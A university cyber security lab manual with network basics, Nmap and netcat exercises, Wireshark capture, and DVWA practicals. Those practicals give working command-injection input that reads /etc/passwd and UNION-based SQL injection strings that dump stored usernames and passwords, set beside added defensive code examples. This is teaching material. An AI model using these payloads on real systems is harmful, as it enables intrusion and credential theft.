Cyber Security Lab Manual


Silver Oak College of Engineering & Technology

GUJARAT TECHNOLOGICAL UNIVERSITY

BACHELOR OF ENGINEERING

CYBER SECURITY
(3150714)

5th SEMESTER

COMPUTER ENGINEERING

Laboratory Manual
DEPARTMENT OF COMPUTER ENGINEERING
VISION

To be recognized for the quality education and research in the field of Computer Engineering known
for its accomplished graduates.

MISSION
1. Continually improve the standard of our graduates by engaging in innovative teaching-learning
methods with high-calibre, motivated faculty members, keeping in line with the rapid
technological advancements.
2. Promote and support research activities over a wide range of academic interests among students
and staff for growth of individual knowledge and continuous learning.
3. Provide an education system that promotes innovation, creativity, entrepreneurial spirit,
leadership as well as freedom of thought with emphasis on professionalism and ethical behavior.

PROGRAM EDUCATIONAL OBJECTIVES (PEO):

PEO1: To provide fundamental knowledge of science and engineering for an IT professional, to
equip them with proficiency in mathematical foundations and algorithmic principles, and to inculcate
competent problem-solving ability.

PEO2: To instil creativity and the ability to design IT systems, and to transmit the knowledge and
skills needed to analyze, design, test and implement various software applications.

PEO3: To exhibit leadership capability, triggering social and economic commitment, and to
inculcate community service.

PEO4: To inculcate professional and social ethics and teamwork in students, and to acquaint them with
the requisite technical and managerial skills to attain a successful career.

PROGRAM OUTCOMES (POs)
Engineering Graduates will be able to:

1. Engineering knowledge: Apply the knowledge of mathematics, science, engineering
fundamentals, and an engineering specialization to the solution of complex engineering
problems.
2. Problem analysis: Identify, formulate, review research literature, and analyze complex
engineering problems reaching substantiated conclusions using first principles of mathematics,
natural sciences, and engineering sciences.
3. Design/development of solutions: Design solutions for complex engineering problems and
design system components or processes that meet the specified needs with appropriate
consideration for the public health and safety, and the cultural, societal, and environmental
considerations.
4. Conduct investigations of complex problems: Use research-based knowledge and research
methods including design of experiments, analysis and interpretation of data, and synthesis of
the information to provide valid conclusions.
5. Modern tool usage: Create, select, and apply appropriate techniques, resources, and modern
engineering and IT tools including prediction and modeling to complex engineering activities
with an understanding of the limitations.
6. The engineer and society: Apply reasoning informed by the contextual knowledge to assess
societal, health, safety, legal and cultural issues and the consequent responsibilities relevant to
the professional engineering practice.
7. Environment and sustainability: Understand the impact of the professional engineering
solutions in societal and environmental contexts, and demonstrate the knowledge of, and need
for sustainable development.
8. Ethics: Apply ethical principles and commit to professional ethics and responsibilities and
norms of the engineering practice.
9. Individual and team work: Function effectively as an individual, and as a member or leader
in diverse teams, and in multidisciplinary settings.
10. Communication: Communicate effectively on complex engineering activities with the
engineering community and with society at large, such as being able to comprehend and write
effective reports and design documentation, make effective presentations, and give and receive
clear instructions.
11. Project management and finance: Demonstrate knowledge and understanding of the
engineering and management principles and apply these to one’s own work, as a member and
leader in a team, to manage projects and in multidisciplinary environments.
12. Life-long learning: Recognize the need for, and have the preparation and ability to engage in
independent and life-long learning in the broadest context of technological change.

CYBER SECURITY PRACTICAL BOOK

DEPARTMENT OF COMPUTER ENGINEERING

PREFACE

It gives us immense pleasure to present the first edition of Cyber Security Practical Book for the
B.E. 3rd year students of Silver Oak College of Engineering and Technology.

The theory and laboratory course of Cyber Security, at Silver Oak College of Engineering
and Technology, Ahmedabad, is designed in such a manner that students can develop the
basic understanding of the subject during theory classes and gain the hands-on practical
experience during their laboratory sessions.

The Laboratory Manual presented here will help you understand network topologies, network
security, and the different tools used for different attacks on security. It also takes you through
various hacking techniques, and it will help you learn Linux programming, which is very useful in
Cyber Security.

Lab Manual Revised by:
Prof. Shital Mehta, Silver Oak College of Engineering and Technology
Prof. Nirav Shah, Silver Oak College of Engineering and Technology
Prof. Hardika Menghani, Aditya Silver Oak Institute of Technology

Lab Manual Revision No.: SOCET_3150714_LM_2020_1

CERTIFICATE

This is to certify that Mr. SHAIKH ANNANAHMED / FURKANAHMED with enrollment no.
190770107264 / 180770107508 from Semester 5-DIV-A has successfully completed his/her
laboratory experiments in the Cyber Security (3150714) from the department of Computer
Engineering during the academic year 2020 / 2021-22.

Date of Submission: ......................... Staff Incharge: ...........................

Head of Department: ...........................................

TABLE OF CONTENT

Sr No   Practical Aim                                                    From   To
1.      To study about Basic concepts of Computer Networks. (Devices,     1      2
        LAN, MAN & WAN)
2.      To study about Network Topologies.                                3      9
3.      TCP Scanning using NMAP.                                         10     13
4.      UDP Port Scanning Using NMAP.                                    14     16
5.      TCP/UDP Connectivity using NETCAT.                               17     20
6.      Web Application Testing using DVWA.                              21     27
7.      SQL Injection using DVWA.                                        28     36
8.      Analyze the Network Traffic using Wireshark.                     37     40
9.      The Practice of Web Application Penetration Testing.             41     54
10.     Case Study on Indian IT ACT 2000.                                55     64
PRACTICAL: 1

AIM: To study about Basic concepts of Computer Networks. (Devices, LAN, MAN & WAN, O.S)

Introduction

Local Area Network (LAN) –

A LAN, or Local Area Network, connects network devices in such a way that personal computers and
workstations can share data, tools and programs. The group of computers and devices is connected
together by a switch, or a stack of switches, using a private addressing scheme as defined by the
TCP/IP protocol. Private addresses are unique in relation to other computers on the local network.
Routers are found at the boundary of a LAN, connecting it to the larger WAN.
Data is transmitted at a very fast rate, as the number of linked computers is limited. By definition, the
connections must be high speed and use relatively inexpensive hardware (such as hubs, network adapters
and Ethernet cables). LANs cover a smaller geographical area (size is limited to a few kilometres) and
are privately owned. One can use a LAN for an office building, home, hospital, school, etc. A LAN is easy
to design and maintain. The communication media used for a LAN are twisted pair cables and coaxial
cables. It covers a short distance, and so error and noise are minimized.
Early LANs had data rates in the 4 to 16 Mbps range. Today, speeds are normally 100 or 1000 Mbps.
Propagation delay is very short in a LAN. The smallest LAN may use only two computers, while
larger LANs can accommodate thousands of computers. A LAN typically relies mostly on wired
connections for increased speed and security, but wireless connections can also be part of a LAN. The
fault tolerance of a LAN is higher and there is less congestion in this network. For example: a group
of students playing Counter Strike in the same room (without internet).
Metropolitan Area Network (MAN) –

A MAN, or Metropolitan Area Network, covers a larger area than a LAN and a smaller area than a
WAN. It connects two or more computers that are apart but reside in the same or different cities. It
covers a large geographical area and may serve as an ISP (Internet Service Provider). A MAN is
designed for customers who need high-speed connectivity. Speeds of a MAN range in terms of Mbps.
It is hard to design and maintain a Metropolitan Area Network.

The fault tolerance of a MAN is less and there is also more congestion in the network. It is costly and
may or may not be owned by a single organization. The data transfer rate and the propagation delay of
a MAN are moderate. Devices used for transmission of data through a MAN are: modem and wire/cable.
Examples of a MAN are the part of a telephone company network that can provide a high-speed
DSL line to the customer, or the cable TV network in a city.
Wide Area Network (WAN) –

A WAN, or Wide Area Network, is a computer network that extends over a large geographical area,
although it might be confined within the bounds of a state or country. A WAN could be a connection
of LANs connecting to other LANs via telephone lines and radio waves, and may be limited to an
enterprise (a corporation or an organization) or accessible to the public. The technology is high speed
and relatively expensive.
There are two types of WAN: Switched WAN and Point-to-Point WAN. A WAN is difficult to design
and maintain. Similar to a MAN, the fault tolerance of a WAN is less and there is more congestion in
the network. The communication media used for a WAN are PSTN or satellite links. Due to long-
distance transmission, noise and error tend to be higher in a WAN.
A WAN's data rate is slow, about a tenth of a LAN's speed, since it involves increased distance and an
increased number of servers, terminals, etc. Speeds of a WAN range from a few kilobits per second (Kbps)
to megabits per second (Mbps). Propagation delay is one of the biggest problems faced here. Devices
used for transmission of data through a WAN are: optical fibres, microwaves and satellites. An example
of a Switched WAN is the asynchronous transfer mode (ATM) network, and of a Point-to-Point WAN the
dial-up line that connects a home computer to the Internet.
Operating System (OS):
An operating system (OS) is basically a collection of software that manages computer hardware
resources and provides common services for computer programs. The operating system is a crucial
component of the system software in a computer system.
A Network Operating System is one of the important types of operating system.
A Network Operating System runs on a server and gives the server the capability to manage data, users,
groups, security, applications, and other networking functions. The basic purpose of the network
operating system is to allow shared file and printer access among multiple computers in a network,
typically a local area network (LAN), a private network, or other networks.
Some examples of network operating systems include Microsoft Windows Server 2003, Microsoft
Windows Server 2008, UNIX, Linux, Mac OS X, Novell NetWare, and BSD.

Advantages
- Centralized servers are highly stable.
- Security is server managed.
- Upgrades to new technologies and hardware can be easily integrated into the system.
- Remote access to servers is possible from different locations and types of systems.

Disadvantages
- High cost of buying and running a server.
- Dependency on a central location for most operations.
- Regular maintenance and updates are required.

PRACTICAL: 2

AIM: To study about Network Topologies.

Network Topology
Computer network topology is the way the various components of a network (nodes, links,
peripherals, etc.) are arranged. Network topologies define the layout, virtual shape or structure of a
network, not only physically but also logically. The way in which different systems and nodes are
connected and communicate with each other is determined by the topology of the network. Topology
can be physical or logical.
Physical topology is the physical layout of nodes, workstations and cables in the network, while
logical topology is the way information flows between the different components.

Types of Physical Network Topologies:

- Bus Topology
- Star Topology
- Ring Topology
- Mesh Topology
- Tree Topology

1. Bus Topology

Bus Topology is the simplest of network topologies. In this type of topology, all the nodes (computers as
well as servers) are connected to a single cable (called the bus) by means of interface connectors.
This central cable is the backbone of the network and is known as the Bus (thus the name). Every
workstation communicates with the other devices through this Bus.

A signal from the source is broadcast and travels to all workstations connected to the bus cable.
Although the message is broadcast, only the intended recipient, whose MAC address or IP
address matches, accepts it. If the MAC/IP address of a machine doesn't match the intended
address, the machine discards the signal.

A terminator is added at the ends of the central cable to prevent bouncing of signals. A barrel connector
can be used to extend it. Below is a basic diagram of a bus topology, followed by the
advantages and disadvantages of Bus Network Topology.

Advantages of Bus Topology

- Easy to connect a computer or peripheral to a linear bus.
- Requires less cable length than a star topology.

Disadvantages of Bus Topology

- Entire network shuts down if there is a break in the main cable.
- Terminators are required at both ends of the backbone cable.
- Difficult to identify the problem if the entire network shuts down.
- Not meant to be used as a stand-alone solution.
2. Star Topology

In Star topology, all the components of the network are connected to a central device called the "hub",
which may be a hub, a router or a switch. Unlike Bus topology (discussed earlier), where nodes were
connected to a central cable, here all the workstations are connected to the central device with a point-to-
point connection. So it can be said that every computer is indirectly connected to every other node
by means of the "hub".

All the data on the star topology passes through the central device before reaching the intended
destination. The hub acts as a junction to connect the different nodes present in the Star network, and at
the same time it manages and controls the whole of the network. Depending on which central device is
used, the "hub" can act as a repeater or signal booster. The central device can also communicate with
other hubs of different networks. Unshielded Twisted Pair (UTP) Ethernet cable is used to connect
workstations to the central node.

Advantages of Star Topology:

- Less damage in case of a single computer failure, as it does not affect the entire network.

Disadvantages of Star topology:

- More cables are required to be connected, because each computer individually connects to the
central server.
- Single point of failure in case the central server goes down.
3. Ring Topology

In Ring Topology, all the nodes are connected to each other in such a way that they make a closed
loop. Each workstation is connected to two other components, one on either side, and it communicates
with these two adjacent neighbours. Data travels around the network in one direction. Sending and
receiving of data takes place with the help of a TOKEN.

Token passing (in brief): the token contains a piece of information which, along with the data, is sent by
the source computer. This token then passes to the next node, which checks whether the signal is intended
for it. If yes, it receives it and passes the empty token into the network; otherwise it passes the token
along with the data to the next node. This process continues until the signal reaches its intended destination.
Only the nodes holding the token are allowed to send data. Other nodes have to wait for an empty
token to reach them. This network is usually found in offices, schools and small buildings.

Advantages of Ring topology:

- Reduced chances of data collision, as each node releases a data packet only after receiving the token.
- Token passing makes ring topology perform better than bus topology under heavy traffic.
- No need of a server to control connectivity among the nodes.
- Equal access to the resources.

Disadvantages of Ring topology:

- In a unidirectional ring, a data packet must pass through all the nodes.
Example: let's say A, B, C, D and E are part of the ring network. The data flow is from A towards
B and so forth. In this condition, if E wants to send a packet to D, the packet must traverse the entire
network to reach it.
- Single point of failure: if a node goes down, the entire network goes down.

4. Mesh Topology

In a mesh network topology, each of the network nodes (computers and other devices) is
interconnected with one another. Every node not only sends its own signals but also relays data from other
nodes. In fact, a true mesh topology is one where every node is connected to every other node in
the network. This type of topology is very expensive as there are many redundant connections, thus
it is not mostly used in computer networks. It is commonly used in wireless networks. Flooding or
routing technique is used in mesh topology.

Types of Mesh Network topologies:

a. Full Mesh Topology: In this, like a true mesh, each component is connected to every other
component. Even after considering the redundancy factor and cost of this network, its main
advantage is that network traffic can be redirected to other nodes if one of the nodes goes
down. Full mesh topology is used only for backbone networks.

b. Partial Mesh Topology: This is far more practical as compared to full mesh topology. Here, some of the
systems are connected in a similar fashion as in mesh topology, while the rest of the systems are
only connected to 1 or 2 devices. It can be said that in a partial mesh, the workstations are indirectly
connected to other devices. This one is less costly and also reduces redundancy.

Advantages of mesh topology:

- Each connection can carry its own data load
- It is robust
- A fault is diagnosed easily
- Provides security and privacy

Disadvantages of mesh topology:

- Installation and configuration are difficult as the connectivity grows
- Cabling cost is higher, and highest in the case of a fully connected mesh topology
- Bulk wiring is required

5. Tree Topology

Tree Topology integrates the characteristics of Star and Bus Topology. Earlier we saw how, in
physical Star network topology, computers (nodes) are connected to each other through a central hub.

In Tree Topology, a number of Star networks are connected using a Bus. This main cable seems like the main
stem of a tree, and the other star networks are the branches. It is also called Expanded Star Topology.
The Ethernet protocol is commonly used in this type of topology. The diagram below will make it clear.

Advantages of tree topology:

- Scalable, as leaf nodes can accommodate more nodes in the hierarchical chain.
- A point-to-point wiring to the central hub at each intermediate node of a tree topology
represents a node in the bus topology
- Other hierarchical networks are not affected if one of them gets damaged
- Easier maintenance and fault finding

Disadvantages of tree topology:

- Huge cabling is needed
- A lot of maintenance is needed
- Backbone forms the point of failure.

6. Hybrid Topology

Hybrid, as the name suggests, is a mixture of two different things. Similarly, in this type of topology
we integrate two or more different topologies to form a resultant topology which has the good points
of each, optimizing the available resources. Special care can be given to nodes where traffic is high as
well as where the chances of fault are high.
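To make the fault-tolerance claims of this practical concrete, here is an added Python example (not from the manual) that models each topology as a small graph, computes which single node failure leaves the remaining nodes unable to all reach each other, and counts hops for the ring example above (E sending to D). The ring is modelled as unidirectional, as the text describes, and the bus cable and the star hub are treated as nodes so that their failure can be tested like a host's.

```python
from collections import deque
from itertools import combinations


def build_topology(kind, hosts):
    """Return a directed adjacency map {node: set(next nodes)} for one topology.

    Undirected links are stored as two directed edges. The bus cable ("bus") and
    the star hub ("hub") are modelled as nodes so their failure can be analysed.
    """
    g = {h: set() for h in hosts}
    if kind == "bus":
        g["bus"] = set(hosts)
        for h in hosts:
            g[h].add("bus")
    elif kind == "star":
        g["hub"] = set(hosts)
        for h in hosts:
            g[h].add("hub")
    elif kind == "ring":
        # Unidirectional ring as described in the manual: data travels one way.
        for a, b in zip(hosts, hosts[1:] + hosts[:1]):
            g[a].add(b)
    elif kind == "mesh":
        # Full mesh: every node linked to every other node in both directions.
        for a, b in combinations(hosts, 2):
            g[a].add(b)
            g[b].add(a)
    else:
        raise ValueError(f"unknown topology: {kind}")
    return g


def reachable(g, start, removed=frozenset()):
    """Nodes reachable from start when the nodes in `removed` have failed."""
    seen, stack = set(), [start]
    while stack:
        n = stack.pop()
        if n in seen or n in removed:
            continue
        seen.add(n)
        stack.extend(g[n])
    return seen


def fully_connected(g, removed=frozenset()):
    """True if every surviving node can still reach every other surviving node."""
    alive = {n for n in g if n not in removed}
    return all(reachable(g, n, removed) == alive for n in alive)


def single_points_of_failure(g):
    """Nodes whose failure alone breaks communication among the remaining nodes."""
    return {n for n in g if not fully_connected(g, {n})}


def hop_count(g, src, dst):
    """Links a frame crosses from src to dst (BFS), or None if dst is unreachable."""
    dist = {src: 0}
    queue = deque([src])
    while queue:
        n = queue.popleft()
        if n == dst:
            return dist[n]
        for m in g[n]:
            if m not in dist:
                dist[m] = dist[n] + 1
                queue.append(m)
    return None


if __name__ == "__main__":
    hosts = ["A", "B", "C", "D", "E"]  # the nodes from the ring example above
    for kind in ("bus", "star", "ring", "mesh"):
        spof = sorted(single_points_of_failure(build_topology(kind, hosts)))
        print(f"{kind:5s} single points of failure: {spof}")
    print("ring, E -> D hops:", hop_count(build_topology("ring", hosts), "E", "D"))
```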

PRACTICAL: 3

AIM: TCP Scanning using NMAP.

Nmap is a tool used for port scanning. It scans for open ports on the target host.
Step 1: Install nmap.exe.
Step 2: Start Nmap.
Following is the GUI of Nmap.

Put Screenshot of Nmap Home Screen:

Step 3: Set the IP address of the target


Step 4: Choose the scan type

Put Screenshot of Choose the scan:

Step 5: Click scan


Result Analysis
Nmap Output
Screenshot:

Ports:

Host Details:

PRACTICAL: 4

AIM: UDP Port Scanning Using NMAP.

Step 1: Install nmap.exe.


Step 2: Start Nmap.
Following is the GUI of Nmap.
Put Screenshot of Nmap Home Screen:

Step 3: Set the IP address of the target


Step 4: Choose the scan type.

Put Screenshot of Choose the scan:

Step 5: Click scan


Result Analysis
Nmap Output:

Ports:
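Added example (not part of the manual or of Nmap) for analysing the results of Practicals 3 and 4: a Python parser for Nmap's grepable output format (-oG), applied to a constructed sample that combines a TCP and a UDP scan, followed by a check that flags listening services missing from an assumed approved-ports baseline. It keeps Nmap's "open|filtered" UDP state separate, since that state means the probe got no answer rather than a confirmed open port.

```python
import re
from collections import defaultdict

# Constructed sample in Nmap's grepable (-oG) format; not output from the lab scan.
SAMPLE_GNMAP = """\
# Nmap scan initiated (constructed sample) as: nmap -sS -sU -oG - 192.168.1.0/24
Host: 192.168.1.10 (fileserver.lab)\tStatus: Up
Host: 192.168.1.10 (fileserver.lab)\tPorts: 22/open/tcp//ssh///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (997)
Host: 192.168.1.20 ()\tStatus: Up
Host: 192.168.1.20 ()\tPorts: 53/open|filtered/udp//domain///, 161/open/udp//snmp///, 80/open/tcp//http///
# Nmap done (constructed sample) -- 256 IP addresses (2 hosts up) scanned
"""

# Assumed baseline: the services the asset owner says should be listening per host.
BASELINE = {
    "192.168.1.10": {(22, "tcp"), (445, "tcp")},
}

# One -oG port entry has the shape port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/([^/]+)/(tcp|udp)/[^/]*/([^/]*)/")


def parse_gnmap(text):
    """Map each host IP to a list of (port, proto, state, service) tuples."""
    results = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines
        ip = line.split()[1]
        m = re.search(r"Ports: (.*?)(?:\t|$)", line)
        if not m:
            continue  # a "Status: Up" line carries no port data
        for entry in m.group(1).split(","):
            pm = PORT_RE.match(entry.strip())
            if pm:
                port, state, proto, service = pm.groups()
                results[ip].append((int(port), proto, state, service))
    return dict(results)


def unexpected_open_ports(results, baseline):
    """Findings for listening services that the baseline does not approve.

    UDP probes with no answer are reported by Nmap as 'open|filtered'; they stay in
    the findings with that state so the reviewer knows they still need confirmation
    instead of being treated as definitely open.
    """
    findings = []
    for ip, ports in results.items():
        approved = baseline.get(ip, set())
        for port, proto, state, service in ports:
            if state in ("open", "open|filtered") and (port, proto) not in approved:
                findings.append((ip, port, proto, state, service))
    return findings


if __name__ == "__main__":
    for f in unexpected_open_ports(parse_gnmap(SAMPLE_GNMAP), BASELINE):
        print("unexpected: %s %d/%s %s (%s)" % f)
```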

PRACTICAL: 5

AIM: TCP/UDP Connectivity using NETCAT.

netcat = net + cat.

It is the cat command over the network, mostly used for file transfer over the network. Learn basic
Unix/Linux commands to understand the working of this tool.

Step 1: Install the ncat. Sometimes it comes with nmap package so check it before installing a fresh
package.

Step 2: Start ncat by going to the ncat folder in cmd.

To show the TCP connection we need to maintain a client-server session

Step 3: Open two 'cmd' windows in administrator mode

Step 4: Go to the folder where ncat.exe is installed (in both windows).

Step 5: Run the command: ncat.exe -l 4444

Here -l sets ncat to listen on port number 4444.

Step 6: On the second cmd (client window) run the command: ncat.exe 127.0.0.1 4444

127.0.0.1 is the local IP address (the address of the same PC), and 4444 is the port number where ncat is
listening. To practise this in the lab, enter your neighbour's IP address, and choose any port
number greater than 1024.

Step 7: Now type the message which is to be sent on the server. As soon as you press the enter key,
the message is sent to the server and it is displayed on the server cmd window.

Step 8: Now the connection has been made. To disconnect, press ctrl+c.

Step 9: To transfer a file, type on the server side:

ncat.exe -l 4444 > input.txt

on the client window:

ncat.exe 127.0.0.1 4444 < output.txt
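The client/server exchange of Steps 5 to 9, reproduced as an added Python example (not ncat's own code): a listener that reads until the client closes the connection, a client that sends a payload and signals end of file, and a UDP variant of the same exchange. It uses the loopback address and an OS-assigned unprivileged port, and returns what the listener received so the transfer can be checked.

```python
import socket
import threading

HOST = "127.0.0.1"  # loopback, as in the manual's single-PC exercise


def tcp_listener(port_box, received, ready):
    """Server side, the equivalent of `ncat -l PORT > input.txt`.

    Binds port 0 so the OS assigns a free port above 1024 (as the manual advises),
    accepts one client and reads until the client closes the connection (EOF).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((HOST, 0))
    srv.listen(1)
    port_box.append(srv.getsockname()[1])
    ready.set()
    conn, _ = srv.accept()
    with conn:
        while True:
            chunk = conn.recv(4096)
            if not chunk:  # client finished: same as ncat reaching EOF on stdin
                break
            received.append(chunk)
    srv.close()


def tcp_send(port, payload):
    """Client side, the equivalent of `ncat 127.0.0.1 PORT < output.txt`."""
    with socket.create_connection((HOST, port)) as cli:
        cli.sendall(payload)          # bytes go on the wire exactly as given: no encryption
        cli.shutdown(socket.SHUT_WR)  # tell the listener there is nothing more to read


def transfer_over_tcp(payload: bytes) -> bytes:
    """Run listener and client together and return what the listener received."""
    port_box, received, ready = [], [], threading.Event()
    worker = threading.Thread(target=tcp_listener, args=(port_box, received, ready))
    worker.start()
    ready.wait()
    tcp_send(port_box[0], payload)
    worker.join()
    return b"".join(received)


def transfer_over_udp(datagram: bytes) -> bytes:
    """The same exchange with `ncat -u`: no connection, no EOF, one datagram per send.

    A UDP listener cannot tell a lost datagram from a silent peer, which is one
    reason the manual's file-transfer step is done over TCP.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind((HOST, 0))
    srv.settimeout(2.0)
    port = srv.getsockname()[1]
    cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        cli.sendto(datagram, (HOST, port))
        data, _ = srv.recvfrom(65535)
    finally:
        cli.close()
        srv.close()
    return data


if __name__ == "__main__":
    msg = b"hello from the client window\n"  # constructed test message
    print("tcp ok:", transfer_over_tcp(msg) == msg)
    print("udp ok:", transfer_over_udp(b"ping") == b"ping")
```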

PRACTICAL: 6

AIM: Web Application Testing using DVWA.

Step 1: Install DVWA Tool.

Step 2: Login to DVWA.

Step 3: Set DVWA Security Level

1. Click on DVWA Security, in the left hand menu.

2. Select "low"

3. Click Submit

Step 4: Command Execution.

1. Click on Command Execution

Step 5: Execute Ping

1. Below we are going to do a simple ping test using the web interface.
2. As an example, ping something on your network.
3. Use the IP Address 192.168.1.106
4. Click Submit.

Attempt 1

1. 192.168.1.106; cat /etc/passwd


2. Click Submit
3. Notice that we are now able to see the contents of the /etc/passwd file

Step 6: Bring up a terminal window.

1. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php
2. Notice the two shell_exec lines.
3. These are the lines that execute ping, depending on which Operating System is being used.
4. In a Unix/Linux command line, you can run multiple commands separated by a ";".
5. Notice the code does not check whether $target matches an IP address,
6. \d+.\d+.\d+.\d+, where "\d+" represents a number with the possibility of multiple digits,
like 192.168.1.106.
7. The code allows an attacker to append commands behind the IP address.
8. 192.168.1.106; cat /etc/passwd

Step 7: Copy the /etc/passwd file to /tmp.

192.168.1.106; cat /etc/passwd | tee /tmp/passwd
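Added example (not DVWA's PHP; a Python rendering of the same pattern): the concatenated-command construction from low.php beside a hardened version that validates the whole input as one IPv4 address and builds an argument list instead of a shell string. The input from Step 6 is used as test data; nothing is executed, the code only shows how a shell would split the string and why a loosely anchored pattern check is not enough.

```python
import ipaddress
import re
import shlex

# A loosely written check like the one sketched in Step 6: it looks for four dotted
# numbers somewhere in the string but is not anchored to the whole input.
LOOSE_IP_RE = re.compile(r"\d+\.\d+\.\d+\.\d+")


def loose_check_passes(target: str) -> bool:
    """Returns True for the injected input too: re.search matches a substring."""
    return LOOSE_IP_RE.search(target) is not None


def is_valid_ipv4(target: str) -> bool:
    """Strict check: the whole input must parse as a single IPv4 address."""
    try:
        ipaddress.IPv4Address(target.strip())
        return True
    except ipaddress.AddressValueError:
        return False


def vulnerable_command(target: str) -> str:
    """The low.php pattern: user input concatenated into a string handed to a shell."""
    return "ping -c 3 " + target


def shell_commands(cmd: str) -> list:
    """Split a command string the way sh would: ';' starts a new command."""
    tokens = list(shlex.shlex(cmd, punctuation_chars=True))
    commands, current = [], []
    for tok in tokens:
        if tok == ";":
            commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def hardened_command(target: str) -> list:
    """Validate first, then build an argv list for subprocess.run(..., shell=False).

    With no shell involved, a ';' in the input can never start a second command,
    and the strict check rejects it anyway.
    """
    if not is_valid_ipv4(target):
        raise ValueError("target must be a single IPv4 address")
    return ["ping", "-c", "3", target.strip()]


if __name__ == "__main__":
    for t in ("192.168.1.106", "192.168.1.106; cat /etc/passwd"):
        print(repr(t), "loose check:", loose_check_passes(t),
              "strict check:", is_valid_ipv4(t),
              "commands sh would run:", len(shell_commands(vulnerable_command(t))))
```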

PRACTICAL: 7

AIM: Manual SQL Injection using DVWA

Step 1: Install DVWA Tool

Step 2: Login to DVWA

Step 3: Select Security Level

Step 4: Select "SQL Injection" from the left navigation menu.

Step 5:

- Input the below text into the User ID textbox (see picture).
- %' or '0'='0 and click Submit.
- In this scenario, we are saying display all records that are false and all records that are true.
- %' - will probably not be equal to anything, and will be false.
- '0'='0' - is equal to true, because 0 will always equal 0.

Step 6:
- Input the below text into the User ID textbox (see picture).
- %' or 0=0 union select null, version() #
- Notice in the last displayed line, 5.1.60 is displayed in the surname.
- This is the version of the MySQL database.

Step 7: Display Database User
- Input the below text into the User ID textbox (see picture).
- %' or 0=0 union select null, user() #
- Notice in the last displayed line, root@localhost is displayed in the surname.
- This is the name of the database user that executed the behind-the-scenes PHP code.

Step 8: Display all tables in information schema
- Input the below text into the User ID textbox (see picture).
- %' and 1=0 union select null, table_name from information_schema.tables #
- Click Submit
- Now we are displaying all the tables in the information schema database.
- The INFORMATION_SCHEMA is the information database, the place that stores
information about all the other databases that the MySQL server maintains.

Step 9: Display all the user tables in information schema.
- Input the below text into the User ID textbox (see picture).
- %' and 1=0 union select null, table_name from information_schema.tables where table_name
like 'user%' #
- Click Submit
- Now we are displaying all the tables that start with the prefix "user" in the information
schema database.

Step 10: Display all the column fields in the information schema user table
- Input the below text into the User ID textbox (see picture).
- %' and 1=0 union select null, concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
- Click Submit
- Now we are displaying all the columns in the users table.
- Notice there are user_id, first_name, last_name, user and password columns.

Step 11: Display all the column field contents in the users table
- Input the below text into the User ID textbox (see picture).
- %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)
from users #
- Click Submit
- Now we have successfully displayed all the necessary authentication information in this
database.
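Added Python example (not DVWA's code) using an in-memory SQLite stand-in for the users table, filled with constructed rows: the string-concatenated query beside a parameterized one, both run with the Step 5 input %' or '0'='0. SQLite is used so the example runs offline; the MySQL-specific # comment and version() payloads of the later steps are not reproduced.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for DVWA's users table, filled with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
        "user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "Asha", "Patel", "asha", "hash-placeholder-1"),
        (2, "Ravi", "Shah", "ravi", "hash-placeholder-2"),
        (3, "Meera", "Joshi", "meera", "hash-placeholder-3"),
    ])
    return conn


def lookup_vulnerable(conn, user_id: str):
    """Builds the query by string concatenation, as DVWA's low-security page does.

    The quote in the input closes the literal and the rest is parsed as SQL, so
    the Step 5 input turns the WHERE clause into  user_id = '%' or '0'='0'  (always true).
    """
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id: str):
    """Parameter binding: the driver passes the whole input as one value.

    The quote and the OR clause never reach the SQL parser; the same input is
    just a user_id that matches no row.
    """
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_demo_db()
    for uid in ("1", "%' or '0'='0"):
        print(repr(uid), "vulnerable:", len(lookup_vulnerable(db, uid)),
              "rows; safe:", len(lookup_safe(db, uid)), "rows")
```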

PRACTICAL: 8

AIM: Analyze the Network Traffic using Wireshark. (Network Sniffer)

A packet sniffer, sometimes referred to as a network monitor or network analyzer, can be used
by a network or system administrator to monitor and troubleshoot network traffic. Using the
information captured by the packet sniffer, an administrator can identify erroneous packets and use
the data to pinpoint bottlenecks and help maintain efficient network data transmission.

In its simplest form, a packet sniffer simply captures all of the packets of data that pass through a given
network interface. By placing a packet sniffer in promiscuous mode, a malicious intruder
can capture and analyze all of the network traffic.

Wireshark is basically a network protocol analyzer, popular for providing the minutest details about your
network protocols, packet information, decryption, etc. It can be used on Windows, Linux, OS X,
Solaris, FreeBSD, NetBSD, and many other systems. The information that is retrieved via this tool
can be viewed through a GUI, or through the TTY-mode TShark utility. You can get your own free version
of the tool from here.

Download and install Wireshark network analyzer.

Steps to capture traffic:


1. Open Wireshark network analyzer.

2. Select interface: go to the Capture option in the menu bar and select the interface.

3. Start capturing.

PRACTICAL: 9

Aim: The Practice of Web Application Penetration Testing.

1. Building Testing Environment

Intrusion of websites is illegal in many countries, so you cannot take others' web sites as your testing
target.
First, you need to build a test environment for yourself. If you are not good at building servers, we
recommend you build a simple one with XAMPP.
OS: Windows 7, 8
Software: XAMPP for Windows, download:
https://www.apachefriends.org/zh_cn/index.html

XAMPP for Windows has modules such as Apache, PHP, Tomcat, MySQL, etc. The default
installation path is c:\xampp; please do not change it.

Take DVWA (Damn Vulnerable Web Application) as an example. Start Apache and MySQL, and
access it with http://127.0.0.1 .
After it has started, you can use the following command to set the password to 123456 (this is a weak
password, just for example; please modify it):
